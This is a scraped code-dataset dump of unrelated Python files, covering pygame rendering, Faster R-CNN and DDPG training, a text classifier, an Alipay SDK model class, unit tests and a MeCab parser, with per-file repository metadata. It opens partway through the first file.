(255, 10, 10, 100))\n            self.draw_transparent_rect(enemy.activity_range_rect, (10, 255, 255, 100))\n            # self.draw_transparent_rect(enemy.getCollisionRect(), (0, 0, 0, 100))\n\n        # Player rects\n        self.draw_transparent_rect(self.player.getRect(), (23, 100, 255, 100))\n        self.draw_transparent_rect(self.player.getCollisionRect(), (10, 255, 255, 100))\n\n    def draw_transparent_rect(self, rect, colour):\n        tmp = pygame.Surface((rect.width, rect.height), pygame.SRCALPHA, 32)\n        tmp.fill(colour)\n        self.manager.getScreen().blit(tmp, (rect.left, rect.top))\n\n    def initialize_lifebar_finalenemy(self):\n        self.healthbar_length = 200\n        self.healthbar_height = 20\n\n    def draw_lifebar_finalenemy(self):\n        for enemy in self.enemyGroup:\n            if type(enemy).__name__ == \"Satan\":\n                if not enemy.health == 500:\n                    health = enemy.health\n                    x = enemy.getRect().left + enemy.getRect().width / 2 - self.healthbar_length / 2\n                    y = enemy.getRect().top - 50\n\n                    # Choose the colour of the health bar\n                    if health < 20:\n                        foreground_color = (255, 0, 0)\n                    else:\n                        foreground_color = (0, 255, 0)\n\n                    # Compute the size of the health bar\n                    health_value = (float(health) / 500 * self.healthbar_length)\n                    outline_rect = pygame.Rect(x, y, self.healthbar_length, self.healthbar_height)\n                    fill_rect = pygame.Rect(x, y, health_value, self.healthbar_height)\n\n                    # Draw the bar\n                    pygame.draw.rect(self.screen, (70, 70, 70), outline_rect)\n                    pygame.draw.rect(self.screen, foreground_color, fill_rect)\n                    pygame.draw.rect(self.screen, (0, 0, 0), outline_rect, 3)\n\n    def events(self, events_list):\n        self.player.move(pygame.key.get_pressed())\n        self.HUD.events(events_list)\n\n    def resetScroll(self):\n        self.playerDisplacement = (0, 0)\n\n    def getDoUpdateScroll(self):\n        return True\n","sub_path":"src/stage/regular/Stage.py","file_name":"Stage.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"36136274","text":"from data import data\nfrom data.data import Dataset\nimport torch \nimport fire\nimport time\nimport os, sys\nimport tqdm\nfrom typing import Dict, Tuple\nfrom torch import nn, optim\nfrom torch.nn import functional\nfrom collections import namedtuple\nfrom visdom import Visdom\n\nfrom face_detection import cig\nfrom face_detection import FasterRcnn\nfrom face_detection.utils import *\n\nclass EasyTrainer(nn.Module): ...\n\nLossTuple = namedtuple(\"LossTuple\", [\n 'rpn_loc_loss',\n 'rpn_cls_loss',\n 'roi_loc_loss',\n 'roi_cls_loss',\n 'total_loss'\n])\n\ndef time_count(f):\n def wrapper(*args, **kwargs):\n start = time.time()\n temp = f(*args, **kwargs)\n print(\"\\033[32mcost time\\033[0m:\", round(time.time() - start, 3), \"\\033[33msecond(s)\\033[0m\")\n return temp\n return wrapper\n\n\n# A single wrapper for easy training process\nclass EasyTrainer(nn.Module):\n def __init__(self, faster_rcnn : FasterRcnn):\n super().__init__()\n\n self.faster_rcnn : FasterRcnn = faster_rcnn\n self.loc_nor_mean : Tuple[float] = faster_rcnn.loc_nor_mean\n self.loc_nor_std : Tuple[float] = faster_rcnn.loc_nor_std\n self.optimizer : optim = faster_rcnn.set_optimizer()\n\n self.rpn_sigma : float = cig.rpn_sigma\n self.roi_sigma : float = cig.roi_sigma\n\n # create target creater\n self.anchorTC : AnchorTargetCreator = AnchorTargetCreator()\n self.proposalTC : ProposalTargetCreator = ProposalTargetCreator()\n \n def forward(self, images : torch.Tensor, bboxes : torch.Tensor, labels : torch.Tensor, scale : float) -> LossTuple:\n if bboxes.shape[0] != 1:\n raise RuntimeError(\"batch_size must be 1!!!\")\n \n _, _, H, W = images.shape\n feature_mapping = self.faster_rcnn.extractor(images)\n rpn_locs, rpn_scores, rois, _, anchor = self.faster_rcnn.rpn(\n x=feature_mapping,\n img_size=[H, W],\n scale=scale\n )\n\n # note that batch size is 1\n bbox = bboxes[0]\n label = labels[0]\n rpn_score = rpn_scores[0]\n rpn_loc = rpn_locs[0]\n roi = rois\n \n # align to get the proposal target value\n sample_roi, gt_roi_loc, gt_roi_label = self.proposalTC(\n roi=roi,\n bbox=safe_to_numpy(bbox),\n label=safe_to_numpy(label),\n loc_normalize_mean=self.loc_nor_mean,\n loc_normalize_std=self.loc_nor_std\n )\n\n sample_roi = safe_to_tensor(sample_roi)\n gt_roi_loc = safe_to_tensor(gt_roi_loc)\n gt_roi_label = safe_to_tensor(gt_roi_label)\n\n # note that we do the forwarding for one data in a batch\n # so all the choosen data in one batch is the first data, whose \n # corresponding index is 0\n sample_roi_indices = torch.zeros(len(sample_roi))\n\n roi_cls_loc, roi_score = self.faster_rcnn.roi_head(\n x=feature_mapping,\n rois=sample_roi,\n roi_indices=sample_roi_indices\n )\n\n \"\"\"calculate the RPN loss\"\"\"\n gt_rpn_loc, gt_rpn_label = self.anchorTC(\n bbox=safe_to_numpy(bbox),\n anchor=anchor,\n img_size=[H, W]\n )\n gt_rpn_label : torch.Tensor = torch.LongTensor(gt_rpn_label)\n gt_rpn_loc : torch.Tensor = safe_to_tensor(gt_rpn_loc)\n\n rpn_loc_loss: torch.Tensor = fast_rcnn_loc_loss(\n pred_loc=rpn_loc,\n gt_loc=gt_rpn_loc,\n gt_label=gt_rpn_label.data,\n sigma=self.rpn_sigma\n )\n\n # remember to ignore the bbox whose tag is -1\n rpn_cls_loss : torch.Tensor = functional.cross_entropy(\n input=rpn_score,\n target=gt_rpn_label.cuda() if cig.use_cuda else gt_rpn_label.cpu(),\n ignore_index=-1 \n )\n\n # cut the path of gradient to reduce the cost on GPU and remove all the label is -1\n mask : torch.Tensor = gt_rpn_label > -1\n gt_rpn_label : torch.Tensor = gt_rpn_label[mask]\n rpn_score : 
torch.Tensor = rpn_score[mask]\n\n \"\"\"calculate the RoI loss\"\"\"\n n : int = roi_cls_loc.shape[0]\n roi_cls_loc : torch.Tensor = roi_cls_loc.view(n, -1, 4)\n\n roi_loc : torch.Tensor = roi_cls_loc[\n torch.arange(0, n),\n gt_roi_label\n ].contiguous()\n\n roi_loc_loss : torch.Tensor = fast_rcnn_loc_loss(\n pred_loc=roi_loc,\n gt_loc=gt_roi_loc,\n gt_label=gt_roi_label,\n sigma=self.roi_sigma\n )\n\n roi_cls_loss = functional.cross_entropy(\n input=roi_score,\n target=gt_roi_label\n ) \n\n\n # count all the loss\n total_loss = rpn_cls_loss + rpn_loc_loss + roi_cls_loss + roi_loc_loss\n loss_tuple = LossTuple(\n rpn_loc_loss=rpn_loc_loss,\n rpn_cls_loss=rpn_cls_loss,\n roi_loc_loss=roi_loc_loss,\n roi_cls_loss=roi_cls_loss,\n total_loss=total_loss\n )\n return loss_tuple\n \n def train_one_image(self, images : torch.Tensor, bboxes : torch.Tensor, labels : torch.Tensor, scale : float) -> LossTuple:\n \"\"\"\n Args\n - images : Actually it is an image, which is shaped as [1, C, H, W]\n - bboxes : GT bbox of the items, which is shaped as [1, d, 4]\n - labels : class of each bboxes, which is shaped as [1, d]\n - scale : ratio between preprocessed image and original image \n \"\"\"\n self.optimizer.zero_grad()\n loss_tuple = self.forward(\n images=images,\n bboxes=bboxes,\n labels=labels,\n scale=scale\n )\n loss_tuple.total_loss.backward()\n self.optimizer.step()\n return loss_tuple\n \n def save(self, save_path : str = None, save_optimizer : bool = True, **kwargs):\n save_dict = {\n \"model\" : self.faster_rcnn.state_dict(),\n \"config\" : cig.state_dict(),\n \"optimizer\" : self.optimizer.state_dict() if save_optimizer else None,\n \"info\" : kwargs\n }\n\n if save_path is None:\n local_time = time.strftime(\"%m%d%H%M\")\n save_path = \"checkpoints/fasterrcnn_{}\".format(local_time)\n for value in kwargs.values():\n save_path += \"_{}\".format(value)\n \n save_dir = os.path.dirname(save_path)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n torch.save(save_dict, save_path)\n\n def load(self, path : str, load_optimizer : bool = True, load_config : bool = True) -> EasyTrainer:\n state_dict = torch.load(path)\n self.faster_rcnn.load_state_dict(\n state_dict=state_dict[\"model\"] if \"model\" in state_dict else state_dict\n )\n\n if load_optimizer and \"optimizer\" in state_dict and state_dict[\"optimizer\"] is not None:\n self.optimizer.load_state_dict(state_dict[\"optimizer\"])\n\n if load_config and \"config\" in state_dict and state_dict[\"config\"] is not None:\n cig.load_dict(state_dict[\"config\"])\n return self\n \n\n@time_count\ndef train(**kwargs): \n # load the configer\n cig.load_dict(**kwargs)\n\n # create model and training wrapper\n model = FasterRcnn()\n trainer = EasyTrainer(model)\n print(\"\\033[32m{}\\033[0m\".format(\"complete creating model and trainer\"))\n if cig.use_cuda:\n trainer = trainer.cuda()\n if cig.model_path:\n trainer.load(\n path=cig.model_path,\n load_optimizer=True,\n load_config=True\n )\n # create visdom\n vis = Visdom()\n\n # for decay of the learning rate\n cur_lr = cig.learning_rate\n \n # create loader of dataset\n data_set = Dataset()\n epoch_iter = tqdm.tqdm(range(cig.epoch), **cig.EPOCH_LOOP_TQDM)\n for epoch in epoch_iter:\n loader = data_set.get_train_loader()\n indices = range(data_set.training_sample_num()) # for progress bar in tqdm\n index_iter = tqdm.tqdm(indices, **cig.BATCH_LOOP_TQDM)\n epoch_iter.set_description_str(\"\\033[32mEpoch {}\\033[0m\".format(epoch))\n\n for index, (b_img, b_bbox, b_label, scales) in 
zip(index_iter, loader):\n scale : float = scales[0]\n\n loss_tuple = trainer.train_one_image(\n images=b_img,\n bboxes=b_bbox,\n labels=b_label,\n scale=scale\n )\n\n post_info = \"\\033[33m{},{},{},{},{}\\033[0m\".format(\n round(loss_tuple.rpn_cls_loss.item(), 2), \n round(loss_tuple.rpn_loc_loss.item(), 2), \n round(loss_tuple.roi_cls_loss.item(), 2), \n round(loss_tuple.roi_loc_loss.item(), 2), \n round(loss_tuple.total_loss.item(), 2)\n )\n \n # set prefix and suffix info for tqdm iterator\n index_iter.set_description_str(\"\\033[32mEpoch {} complete!\\033[0m\".format(epoch)\n if index == (data_set.training_sample_num() - 1) else \"\\033[35mtraining...\\033[0m\")\n index_iter.set_postfix_str(post_info)\n\n trainer.save()\n\nif __name__ == \"__main__\":\n fire.Fire(train)","sub_path":"train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":9211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"587401530","text":"# Copyright 2017 Mark Pfeiffer, ASL, ETH Zurich, Switzerland\n# Copyright 2017 Fadri Furrer, ASL, ETH Zurich, Switzerland\n# Copyright 2017 Renaud Dubé, ASL, ETH Zurich, Switzerland\n\nimport numpy as np\nimport FCLayer as fc_layer\nimport pickle as pkl\nimport os\n\n\nclass Params():\n\n training_batch_size = 10\n max_training_steps = 1000\n print_steps = 100\n\n\nclass ModelWrapper():\n\n network = None\n optimizer = None\n loss_function = None\n x = None\n y_target = None\n params = None\n current_idx = 0\n\n def __init__(self, network, loss_function, optimizer, x, y_target, params):\n self.params = params\n self.network = network\n self.optimizer = optimizer\n self.loss_function = loss_function\n # Training data\n self.x = x\n self.y_target = y_target\n\n def setNetwork(self, network):\n self.network = network\n\n def getNetwork(self):\n return self.network\n\n def setOptimizer(self, optimizer):\n self.optimizer = optimizer\n\n def getOptimizer(self):\n return self.optimizer\n\n def getNextDataPoint(self):\n if self.current_idx >= self.x.shape[0]:\n self.current_idx = 0\n input_batch = np.array([self.x[self.current_idx, :]])\n label_batch = np.array([self.y_target[self.current_idx, :]])\n self.current_idx += 1\n return input_batch, label_batch\n\n def getNextTrainingBatch(self, batch_size=1):\n input_batch = np.zeros([batch_size, self.x.shape[1]])\n label_batch = np.zeros([batch_size, self.y_target.shape[1]])\n for i in range(batch_size):\n X, y_target = self.getNextDataPoint()\n input_batch[i, :] = X\n label_batch[i, :] = y_target\n return input_batch, label_batch\n\n def prediction(self, x):\n y_net = self.network.output(x)\n y = np.zeros(y_net.shape)\n y[0, np.argmax(y_net)] = 1\n return y\n\n def train(self):\n step = 0\n loss_evolution = np.zeros([self.params.max_training_steps, 2])\n while step < self.params.max_training_steps:\n x_batch, y_target_batch = self.getNextTrainingBatch(\n self.params.training_batch_size)\n loss = self.optimizer.updateStep(self.network, self.loss_function,\n x_batch, y_target_batch)\n loss_evolution[step, :] = np.array([step, loss])\n if step % self.params.print_steps == 0:\n print(\"Loss in step {} is {}.\".format(step, loss))\n step += 1\n\n return loss_evolution\n\n def eval(self, x, y_target):\n eval_size = x.shape[0]\n correct_classifications = 0\n for i in range(eval_size):\n prediction = self.prediction(np.array([x[i, :]]))\n truth = np.array([y_target[i, :]])\n if np.all(prediction == truth):\n correct_classifications += 1.0\n return correct_classifications / float(eval_size)\n\n def loss(self, x, y_target):\n return self.loss_function.evaluate(self.prediction(x), y_target)\n\n def gradients(self, x, y_target):\n return self.network.gradients(x, self.loss_function, y_target)\n","sub_path":"5_deep_learning/solution/01_DL_framework/ModelWrapper.py","file_name":"ModelWrapper.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"120032772","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\n\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n return nn.Sequential(*layers)\n\n\ndef pi_newtork(obs_size, act_size, hidden_size):\n net = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, act_size),\n nn.Tanh())\n return net\n\ndef q_newtork(obs_size, act_size, hidden_size):\n in_size = obs_size + act_size\n net = nn.Sequential(\n nn.Linear(in_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, 1),\n nn.Identity())\n return net\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\nclass MLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n device='cuda'\n pi_sizes = [obs_dim] + list(hidden_sizes) + [act_dim]\n #print(obs_dim, act_dim, hidden_sizes)\n self.pi = pi_newtork(obs_dim,act_dim, hidden_sizes[0])#mlp(pi_sizes, activation, nn.Tanh)\n self.act_limit = torch.from_numpy(act_limit).to(device)\n\n def forward(self, obs):\n # Return output from network scaled to action space limits.\n return self.act_limit * self.pi(obs)\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.q = q_newtork(obs_dim,act_dim, hidden_sizes[0])#mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.ReLU):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high\n device = 'cuda'\n # build policy and value functions\n self.pi = MLPActor(obs_dim, act_dim, hidden_sizes, activation, act_limit).to(device)\n self.q = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n\n def act(self, obs):\n with torch.no_grad():\n return self.pi(obs).cpu().data.numpy()\n","sub_path":"Code/core_DDPG.py","file_name":"core_DDPG.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"568646003","text":"import numpy as np\nimport re\n\n# read the input file\nf = open(\"q10.in\",'r')\nr = f.read()\nf.close()\n\n# Find all values and shape them into entries\nread = np.array( [int(i) for i in re.findall(r\"-?\\d+\",r)] ).reshape(-1,4)\nposn, v = read[:,:2], read[:,2:]\n\n# Use the bounding-box area as a heuristic:\n# the area should be smallest at the moment the word is formed\nmin_axis, max_axis = posn.min(axis=0)-1, posn.max(axis=0)+2\nsize = max_axis-min_axis\narea = int(size[0]) * int(size[1])\nnew = area\n\nwhile new <= area:\n\t# Move to new position\n\tposn += v\n\n\t# Heuristics\n\tarea = new\n\tmin_axis, max_axis = posn.min(axis=0)-1, posn.max(axis=0)+2\n\tsize = max_axis-min_axis\n\tnew = int(size[0]) * int(size[1])\n\n# Print picture\nimport matplotlib.pyplot as plt\nposn -= v # step back once: the last move made the area grow again\nresult = np.zeros(max_axis-min_axis,dtype=int)\nfor p in posn:\n\tx,y = p-min_axis\n\tresult[x,y]=1\nplt.plot(posn[:,:1],-posn[:,1:],'bo') # invert y because +ve y is downwards\nplt.show() # collapse window size to see picture","sub_path":"2018/Q10/q10_1.py","file_name":"q10_1.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550148965","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipayEcoPrinterStatusQueryModel(object):\n\n def __init__(self):\n self._client_id = None\n self._client_secret = None\n self._eprint_token = None\n self._machine_code = None\n\n @property\n def client_id(self):\n return self._client_id\n\n @client_id.setter\n def client_id(self, value):\n self._client_id = value\n @property\n def client_secret(self):\n return self._client_secret\n\n @client_secret.setter\n def client_secret(self, value):\n self._client_secret = value\n @property\n def eprint_token(self):\n return self._eprint_token\n\n @eprint_token.setter\n def eprint_token(self, value):\n self._eprint_token = value\n @property\n def machine_code(self):\n return self._machine_code\n\n @machine_code.setter\n def machine_code(self, value):\n self._machine_code = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.client_id:\n if hasattr(self.client_id, 'to_alipay_dict'):\n params['client_id'] = self.client_id.to_alipay_dict()\n else:\n params['client_id'] = self.client_id\n if self.client_secret:\n if hasattr(self.client_secret, 'to_alipay_dict'):\n params['client_secret'] = self.client_secret.to_alipay_dict()\n else:\n params['client_secret'] = self.client_secret\n if self.eprint_token:\n if hasattr(self.eprint_token, 'to_alipay_dict'):\n params['eprint_token'] = self.eprint_token.to_alipay_dict()\n else:\n params['eprint_token'] = self.eprint_token\n if self.machine_code:\n if hasattr(self.machine_code, 'to_alipay_dict'):\n params['machine_code'] = self.machine_code.to_alipay_dict()\n else:\n params['machine_code'] = self.machine_code\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayEcoPrinterStatusQueryModel()\n if 'client_id' in d:\n o.client_id = d['client_id']\n if 'client_secret' in d:\n o.client_secret = d['client_secret']\n if 'eprint_token' in d:\n o.eprint_token = d['eprint_token']\n if 'machine_code' in d:\n o.machine_code = d['machine_code']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayEcoPrinterStatusQueryModel.py","file_name":"AlipayEcoPrinterStatusQueryModel.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"647395425","text":"import unittest\nfrom functools import partial\n\nimport numpy as np\n\nfrom dpipe.layers import identity\nfrom dpipe.medim.preprocessing import pad, min_max_scale, normalize\nfrom dpipe.medim.utils import filter_mask, apply_along_axes\nfrom dpipe.medim.itertools import zip_equal, flatten, extract, negate_indices, head_tail, peek\n\n\nclass TestPad(unittest.TestCase):\n def test_pad(self):\n x = np.arange(12).reshape((3, 2, 2))\n padding = np.array(((0, 0), (1, 2), (2, 1)))\n padding_values = np.min(x, axis=(1, 2), keepdims=True)\n\n y = pad(x, padding, padding_values=padding_values)\n np.testing.assert_array_equal(y, np.array([\n [\n [0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0],\n [0, 0, 2, 3, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n [\n [4, 4, 4, 4, 4],\n [4, 4, 4, 5, 4],\n [4, 4, 6, 7, 4],\n [4, 4, 4, 4, 4],\n [4, 4, 4, 4, 4],\n ],\n [\n [8, 8, 8, 8, 8],\n [8, 8, 8, 9, 8],\n [8, 8, 10, 11, 8],\n [8, 8, 8, 8, 8],\n [8, 8, 8, 8, 8],\n ],\n ]))\n\n\nclass TestItertools(unittest.TestCase):\n @staticmethod\n def get_map(size):\n return TestItertools.make_iterable(range(size))\n\n @staticmethod\n def make_iterable(it):\n return map(lambda x: x, it)\n\n def test_zip_equal_raises(self):\n for args in [[range(5), range(6)], [self.get_map(5), self.get_map(6)], [range(7), self.get_map(6)],\n [self.get_map(6), range(5)], [self.get_map(6), range(5), range(7)]]:\n with self.subTest(args=args), self.assertRaises(ValueError):\n list(zip_equal(*args))\n\n def test_zip_equal(self):\n for args in [[range(5), range(5)], [self.get_map(5), self.get_map(5)],\n [range(5), self.get_map(5)], [self.get_map(5), range(5)]]:\n with self.subTest(args=args):\n self.assertEqual(len(list(zip_equal(*args))), 5)\n\n for args in [[], [range(5)], [range(5), range(5)], [range(5), range(5), range(5)]]:\n with self.subTest(args=args):\n self.assertListEqual(list(zip_equal(*args)), list(zip(*args)))\n\n def test_flatten(self):\n self.assertListEqual(flatten([1, [2, 3], [[4]]]), [1, 2, 3, 4])\n self.assertListEqual(flatten([1, (2, 3), [[4]]]), [1, (2, 3), 4])\n self.assertListEqual(flatten([1, (2, 3), [[4]]], iterable_types=(list, tuple)), [1, 2, 3, 4])\n self.assertListEqual(flatten(1, iterable_types=list), [1])\n\n def test_extract(self):\n idx = [2, 5, 3, 9, 0]\n self.assertListEqual(extract(range(15), idx), idx)\n\n def test_filter_mask(self):\n # TODO: def randomized_test\n mask = np.random.randint(2, size=15, dtype=bool)\n values, = np.where(mask)\n np.testing.assert_array_equal(list(filter_mask(range(15), mask)), values)\n\n def test_negate_indices(self):\n idx = [2, 5, 3, 9, 0]\n other = [1, 4, 6, 7, 8, 10, 11, 12]\n np.testing.assert_array_equal(negate_indices(idx, 13), other)\n\n def test_head_tail(self):\n for size in range(1, 20):\n it = np.random.randint(1000, size=size).tolist()\n head, tail = head_tail(self.make_iterable(it))\n self.assertEqual(head, it[0])\n self.assertListEqual(list(tail), it[1:])\n\n def test_peek(self):\n for size in range(1, 20):\n it = np.random.randint(1000, size=size).tolist()\n head, new_it = peek(self.make_iterable(it))\n self.assertEqual(head, it[0])\n self.assertListEqual(list(new_it), it)\n\n\nclass TestApplyAlongAxes(unittest.TestCase):\n def test_apply(self):\n x = np.random.rand(3, 10, 10) * 2 + 3\n np.testing.assert_array_almost_equal(\n apply_along_axes(normalize, x, axes=(1, 2), percentiles=20),\n normalize(x, percentiles=20, axes=0)\n )\n\n axes = (0, 2)\n y = apply_along_axes(min_max_scale, x, axes)\n 
np.testing.assert_array_almost_equal(y.max(axes), 1)\n np.testing.assert_array_almost_equal(y.min(axes), 0)\n\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, 1), x)\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, -1), x)\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, (0, 1)), x)\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, (0, 2)), x)\n","sub_path":"dpipe/medim/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"318508662","text":"import os\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nimport tensorflow\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport pickle\n\n# Read Data\n\npositive_files_names = os.listdir(\"dataset/train/positive\")\nnegative_files_names = os.listdir(\"dataset/train/negative\")\n\ndocs_list = []\n\nfor file_name in positive_files_names:\n    file = open(\"dataset/train/positive/\" + str(file_name), \"r\")\n    docs_list.append(file.read())\n\nfor file_name in negative_files_names:\n    file = open(\"dataset/train/negative/\" + str(file_name), \"r\")\n    docs_list.append(file.read())\n\nlabels_positive = [1] * len(positive_files_names)\nlabels_negative = [0] * len(negative_files_names)\n\nlabels = labels_positive + labels_negative\nlabels = np.array(labels)\n\nMAX_SEQUENCE_LENGTH = 1000\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(docs_list)\nsequences = tokenizer.texts_to_sequences(docs_list)\nword_index = tokenizer.word_index # the dictionary\nprint(word_index)\nprint('Found %s unique tokens.' % len(word_index))\ndocs_words_index = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)\nprint('Shape of samples:', docs_words_index.shape)\nprint('Sample: (the zeros at the beginning are for padding text to max length)')\n# print(docs_words_index[2])\n\n\nEMBEDDING_DIM = 100\nprint('Indexing word vectors.')\nembeddings_index = {}\nwith open('glove.6B.100d.txt', encoding=\"utf8\") as f:\n    for line in f:\n        values = line.split(sep=' ')\n        word = values[0]\n        coefs = np.asarray(values[1:], dtype='float32')\n        embeddings_index[word] = coefs\n# print('Found %s word vectors.'
% len(embeddings_index))\n\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n\n# print ('Shape of Embedding Matrix: ',embedding_matrix.shape)\n# print(embedding_matrix)\n\ndocs_words_embeddings = np.zeros((len(docs_list), MAX_SEQUENCE_LENGTH, 100))\n\nfor i in range(len(docs_words_index)):\n for j in range(MAX_SEQUENCE_LENGTH):\n word_index = docs_words_index[i][j]\n docs_words_embeddings[i][j] = embedding_matrix[word_index]\n\ndocs_sentence_embeddings = np.zeros((len(docs_list), 100))\n\nfor i in range(len(docs_words_embeddings)):\n docs_sentence_embeddings[i] = np.sum(docs_words_embeddings[i], axis=0)\n\nprint(docs_sentence_embeddings[-1])\n\nx_train, x_test, y_train, y_test = train_test_split(docs_sentence_embeddings, labels, test_size=0.20, random_state=1)\n\n# # Train model\n#\n#\n# logistic_regression = LogisticRegression()\n# logistic_regression.fit(x_train, y_train)\n#\n# # Save model\n#\n# filename = 'sentence_embedding_sum.sav'\n# pickle.dump(logistic_regression, open(filename, 'wb'))\n#\n#\n# prediction = logistic_regression.predict(x_test)\n# score = accuracy_score(y_test, prediction)\n#\n# print(\"accuracy: \")\n# print(score)\n\n\n# Load model\nfilename = 'sentence_embedding_sum.sav'\n\nloaded_logistic_regression = pickle.load(open(filename, 'rb'))\nprediction = loaded_logistic_regression.predict(x_test)\nscore = accuracy_score(y_test, prediction)\n\nprint(\"accuracy: \")\nprint(score)\n\nprint(loaded_logistic_regression.predict(docs_sentence_embeddings[:10]))\nprint(loaded_logistic_regression.predict(docs_sentence_embeddings[-10:]))\n\n","sub_path":"review classifcation/word embeddings or sentence embeddings/sum of word embeddings/sentence_embedding_sum.py","file_name":"sentence_embedding_sum.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"267895260","text":"#! /usr/bin/env python3\n\nimport MeCab\nraw_filename = 'neko.txt'\nfilename = 'neko.txt.mecab'\n\ndef write_morphological_analysis_result(n = None):\n lines = readlines_from(raw_filename, n)\n result = morphological_analysis(lines)\n with open(filename, 'w') as f:\n for r in result:\n f.write(r)\n\ndef read_morphological_analysis_result(n = None):\n return readlines_from(filename, n)\n\ndef parse_morphological_analysis_result(lines):\n lines_list = split_into_lines_list(lines)\n map_list = []\n for lines_list_elem in lines_list:\n m = make_map_from(lines_list_elem)\n map_list.append(m)\n return map_list\n\ndef split_into_lines_list(lines):\n lines_list = []\n begin = 0\n while begin < len(lines):\n line = split_lines_begin_with(lines, begin)\n lines_list.append(line)\n begin += len(line) + 1\n return lines_list\n\ndef split_lines_begin_with(lines, begin):\n eos = 'EOS'\n index_eos = lines.index(eos, begin)\n return lines[begin : index_eos]\n\ndef make_map_from(lines_list_elem):\n map_list= []\n for l in lines_list_elem:\n elem_list = l.split('\\t')\n surface = elem_list[0]\n base = elem_list[2]\n pos = elem_list[3]\n pos1 = elem_list[4]\n m = dict(surface = surface, base = base, pos = pos, pos1 = pos1)\n map_list.append(m)\n return map_list\n\ndef get_tagger():\n return MeCab.Tagger('-O chasen')\n\ndef morphological_analysis(lines, tagger = None):\n t = tagger\n if t is None:\n t = get_tagger()\n ret = []\n for l in lines:\n ret.append(morphological_analysis_one_line(l, t))\n return ret\n\ndef morphological_analysis_one_line(line, tagger):\n return tagger.parse(line)\n\ndef readlines_from(filename, n = None):\n with open(filename) as f:\n lines = f.readlines()\n if n is None or n > len(lines):\n return list(map(lambda x: rstrip_only_new_line(x), lines))\n else:\n return list(map(lambda x: rstrip_only_new_line(x), lines[ : n]))\n\ndef rstrip_only_new_line(x):\n stripped = x\n while True:\n if len(stripped) <= 0:\n return stripped\n if stripped[-1] == '\\n':\n stripped = stripped[ : -1]\n else:\n break\n return stripped\n\ndef write_map_list(map_list):\n for map_list_elem_for_oneline in map_list:\n write_oneline(map_list_elem_for_oneline)\n\ndef write_oneline(oneline):\n for m in oneline:\n print(m)\n\nif __name__ == '__main__':\n #write_morphological_analysis_result()\n lines = read_morphological_analysis_result()\n map_list = parse_morphological_analysis_result(lines)\n write_map_list(map_list)\n","sub_path":"language_processing_100/python3/sect4/NLP30.py","file_name":"NLP30.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
